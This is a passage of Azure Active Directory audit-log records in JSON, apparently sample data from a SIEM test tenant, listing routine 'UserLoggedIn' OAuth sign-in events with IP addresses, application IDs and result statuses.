{"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "213.97.47.133", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "213.97.47.133", "ApplicationId": "00000002-0000-0ff1-ce00-000000000000", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000002-0000-0ff1-ce00-000000000000"}], "ObjectId": "00000002-0000-0ff1-ce00-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "4d1bd763-9b0b-4d5a-bda9-5c7a0a0a6000", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Success"}, {"Name": "KeepMeSignedIn", "Value": 
"True"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "e031670b-bb84-45ee-94ff-0e70a8cd1138"} -{"InterSystemsId": "425503c9-ccbf-4674-8f1e-4d56510474fd", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-08T14:33:54", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "37.29.234.179", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "37.29.234.179", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000003-0000-0000-c000-000000000000"}], "ObjectId": "00000003-0000-0000-c000-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "57ef1056-6ce2-424a-b241-ce3939d00900", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "True"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "d39944c4-6766-4a89-8d5a-c789175830ee"} -{"InterSystemsId": "4409eeeb-0ca5-42dd-99d9-4a6b2fabfa4f", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:13:12", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": 
"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "ApplicationId": "4345a7b9-9a63-4910-a426-35363201d503", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000002-0000-0000-c000-000000000000"}], "ObjectId": "00000002-0000-0000-c000-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "0c8fcffc-a810-4a85-b8e2-3a2fda925c00", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Success"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "6f2b7716-1acc-450d-ae13-afad7e02d07e"} -{"InterSystemsId": "4542ce7e-270b-435e-8f81-ee23ea74be75", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-12T21:38:35", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "79.159.10.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "79.159.10.151", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "Unknown"}], "ObjectId": "Unknown", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "9718abaa-220e-49c5-8c9b-588d32b8db00", 
"ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "47f3c440-3fb7-4b5e-9c20-455470b289d2"} -{"InterSystemsId": "4836e306-1460-4f34-ab55-a74c9a14f50d", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-08T14:38:40", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "37.29.234.179", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "37.29.234.179", "ApplicationId": "80ccca67-54bd-44ab-8625-4b79c4dc7775", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000002-0000-0000-c000-000000000000"}], "ObjectId": "00000002-0000-0000-c000-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "2fde8302-c39e-40b6-9c7f-1bb9d4800a00", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Success"}, {"Name": "KeepMeSignedIn", "Value": "True"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "5a3435d0-229a-41c8-bd21-b4f2b662d0f6"} -{"InterSystemsId": 
"4a50a549-adf3-4a22-9037-7fd8cd3d0116", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:13:16", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "ApplicationId": "4345a7b9-9a63-4910-a426-35363201d503", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000002-0000-0000-c000-000000000000"}], "ObjectId": "00000002-0000-0000-c000-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "1d856a16-b179-41ab-9c0d-af1d2b925100", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Success"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "5aff2d1c-b203-46a6-96f0-b8f908f0e968"} -{"InterSystemsId": "4e44a55e-9c0d-4cea-b000-1b79e96dcf57", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:13:16", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": 
"83.57.233.151", "ApplicationId": "4345a7b9-9a63-4910-a426-35363201d503", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000002-0000-0000-c000-000000000000"}], "ObjectId": "00000002-0000-0000-c000-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "fc33c54e-38b9-4ef2-a4ee-a3a324a45500", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Success"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "3d8033cf-eecd-4eee-87a5-795efd8a1d3d"} -{"InterSystemsId": "4e91c3e1-819e-4ebc-ae68-2037cfc2db92", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-12T21:38:25", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "79.159.10.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "79.159.10.151", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "Unknown"}], "ObjectId": "Unknown", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "a063e495-5883-4837-8186-5828f9f2d500", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": 
"OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "8bd0a250-74f6-4eeb-ba20-c5bdbd977013"} -{"InterSystemsId": "50d648cb-466d-4cf4-b2f8-3b7e84f47040", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:44:04", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "213.97.47.133", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "213.97.47.133", "ApplicationId": "08e18876-6177-487e-b8b5-cf950c1e598c", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000003-0000-0ff1-ce00-000000000000"}], "ObjectId": "00000003-0000-0ff1-ce00-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "64613cae-510d-4a52-b486-070b775e5800", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "True"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "a6fc9a9b-3b7e-4d33-8c0c-1d33d023e558"} -{"InterSystemsId": "5a453031-0cc3-4577-a589-4c3bf37eed78", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-12T10:51:45", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": 
"asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "79.159.10.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "79.159.10.151", "ApplicationId": "4345a7b9-9a63-4910-a426-35363201d503", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000002-0000-0000-c000-000000000000"}], "ObjectId": "00000002-0000-0000-c000-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "814a32f0-27fd-4e82-855c-13da15a4c300", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Success"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "19d57a4a-d32e-4dc6-971f-3491bc440023"} -{"InterSystemsId": "5cd6215d-e206-4c3f-805d-6e386cbdab7a", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:13:01", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "ApplicationId": "4345a7b9-9a63-4910-a426-35363201d503", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000002-0000-0000-c000-000000000000"}], "ObjectId": 
"00000002-0000-0000-c000-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "9c218a27-ed51-4011-8383-e76850e85000", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Success"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "0b158f74-e223-43c8-9cfd-5f4442f29fc7"} -{"InterSystemsId": "612b339f-1088-a000-f25f-9c8af4d57894", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:43:51", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "213.97.47.133", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "213.97.47.133", "ApplicationId": "00000003-0000-0ff1-ce00-000000000000", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000003-0000-0ff1-ce00-000000000000"}], "ObjectId": "00000003-0000-0ff1-ce00-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "c847a864-4ba2-4d8b-a9f2-5f1c1c5c5e00", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Success"}, {"Name": "KeepMeSignedIn", "Value": "True"}], "TargetContextId": 
"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "4819a0c2-2050-4549-ab66-f5b90cbbcc5a"} -{"InterSystemsId": "61eb5713-2687-4c00-a7b2-fde4788c395b", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-12T21:38:29", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "79.159.10.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "79.159.10.151", "ApplicationId": "80ccca67-54bd-44ab-8625-4b79c4dc7775", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000002-0000-0000-c000-000000000000"}], "ObjectId": "00000002-0000-0000-c000-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "3db9a461-6dd1-4950-b3e3-fbe8c2d5c700", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Success"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "e94002d9-f6e8-46f9-8702-2a29e908e73d"} -{"InterSystemsId": "61f81224-65fd-4c1b-b388-ee0e25485191", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-12T21:38:37", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", 
"RecordType": 15, "ActorIpAddress": "79.159.10.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "79.159.10.151", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000003-0000-0000-c000-000000000000"}], "ObjectId": "00000003-0000-0000-c000-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "dc0cc415-9a00-470d-bda3-867e11fdd400", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "1ca4f684-3a34-44a8-99b8-064d1071768a"} -{"InterSystemsId": "661f2330-3e04-483d-9781-caaa4543cc13", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-12T10:51:50", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "79.159.10.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "79.159.10.151", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000003-0000-0000-c000-000000000000"}], "ObjectId": "00000003-0000-0000-c000-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "01c15486-46e2-487a-91f5-11445da0b600", 
"ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "3f6c8eb2-c64b-4dc5-b8fd-be252f8e09c2"} -{"InterSystemsId": "68d7eaa4-aa57-4508-9792-09e80c911aa1", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:13:42", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "0f698dd4-f011-4d23-a33e-b36416dcb1e6"}], "ObjectId": "0f698dd4-f011-4d23-a33e-b36416dcb1e6", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "1590b91f-bffe-4cd8-9028-de52692f5400", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "UserAuthenticationMethod", "Value": "9"}, {"Name": "RequestType", "Value": "OAuth2:Authorize"}, {"Name": "ResultStatusDetail", "Value": "Redirect"}, {"Name": "KeepMeSignedIn", "Value": "False"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "b290b902-b6f2-49f6-b7f8-ea1541d85c8c"} -{"InterSystemsId": 
"6ae96167-2df2-425c-9f91-27e6345eb782", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:42:59", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "213.97.47.133", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "213.97.47.133", "LogonError": "FlowTokenExpired", "ApplicationId": "4345a7b9-9a63-4910-a426-35363201d503", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 0, "ID": "00000002-0000-0000-c000-000000000000"}], "ObjectId": "00000002-0000-0000-c000-000000000000", "ModifiedProperties": [], "ResultStatus": "Succeeded", "IntraSystemId": "f54da4fe-0a54-45f3-b6ea-39f873eb6000", "ExtendedProperties": [{"Name": "UserAgent", "Value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0"}, {"Name": "RequestType", "Value": "Login:login"}, {"Name": "ResultStatusDetail", "Value": "Success"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "UserLoggedIn", "Id": "b0c1c4a7-c6db-4f14-b628-54e37a7a6785"} -{"InterSystemsId": "6ae96167-2df2-425c-9f91-27e6345eb782", "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-07T16:43:02", "Actor": [{"Type": 0, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 15, "ActorIpAddress": "213.97.47.133", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "213.97.47.133", "LogonError": 
